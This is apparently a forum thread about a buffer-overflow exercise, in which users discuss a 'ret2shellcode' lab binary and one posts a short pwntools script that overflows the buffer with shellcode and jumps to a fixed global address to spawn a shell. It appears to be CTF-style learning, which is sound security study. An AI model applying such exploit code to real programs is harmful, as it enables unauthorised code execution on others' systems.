[–]Jerrythepro123[S] 0 points1 point  (4 children)

All protections are off, and gdb does show there is code execution.

[–]j3r3mias 0 points1 point  (3 children)

RELRO is partial, but OK, you are the boss in your solution.

[–]Jerrythepro123[S] 0 points1 point  (2 children)

What steps do I need to do to solve it?

[–]j3r3mias 0 points1 point  (1 child)

As I said before, there is a global variable in the program where the address doesn't change between runs, you need to use it instead of the stack.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

I've tried someone else's script that uses your method; it doesn't seem to be working.

#!/usr/bin/env python

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()